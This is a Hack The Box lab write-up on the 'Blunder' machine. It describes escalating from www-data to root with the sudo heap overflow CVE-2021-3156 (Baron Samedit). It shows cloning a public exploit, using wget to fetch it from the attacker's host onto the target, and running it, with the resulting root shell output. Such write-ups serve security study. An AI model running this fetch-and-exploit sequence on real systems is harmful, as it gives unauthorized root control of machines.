InfoSec LAB

Blunder_Privilege_Escalation_2

Created: 2 min read

CVE-2021-3156

Earlier, PEAS discovered that the target system is vulnerable to CVE-2021-3156

a vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software). It has been rated as critical. This issue affects the function sudoers_policy_main. The manipulation with an unknown input leads to a heap-based overflow vulnerability. Using CWE to declare the problem leads to CWE-122. A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Impacted is confidentiality, integrity, and availability.

exploit (sudo baron samedit 2)

Exploit found online

┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ git clone https://github.com/worawit/CVE-2021-3156.git ; tar -czf CVE-2021-3156.tar.gz CVE-2021-3156
Cloning into 'CVE-2021-3156'...
remote: Enumerating objects: 86, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 86 (delta 16), reused 10 (delta 10), pack-reused 68
Receiving objects: 100% (86/86), 41.65 KiB | 1.49 MiB/s, done.
Resolving deltas: 100% (46/46), done.

Downloading the Exploit package to Kali

Exploitation

www-data@blunder:/dev/shm$ wget -q http://10.10.14.17/CVE-2021-3156.tar.gz ; tar -xf CVE-2021-3156.tar.gz ; cd CVE-2021-3156

Delivery complete over HTTP

www-data@blunder:/dev/shm/CVE-2021-3156$ python3 exploit_nss.py
# whoami
whoami
root
# hostname
hostname
blunder
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.191  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:30a  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:30a  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:0a  txqueuelen 1000  (Ethernet)
        RX packets 4718606  bytes 412532006 (412.5 MB)
        RX errors 0  dropped 176  overruns 0  frame 0
        TX packets 3614357  bytes 2490119236 (2.4 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 26345  bytes 2331263 (2.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 26345  bytes 2331263 (2.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks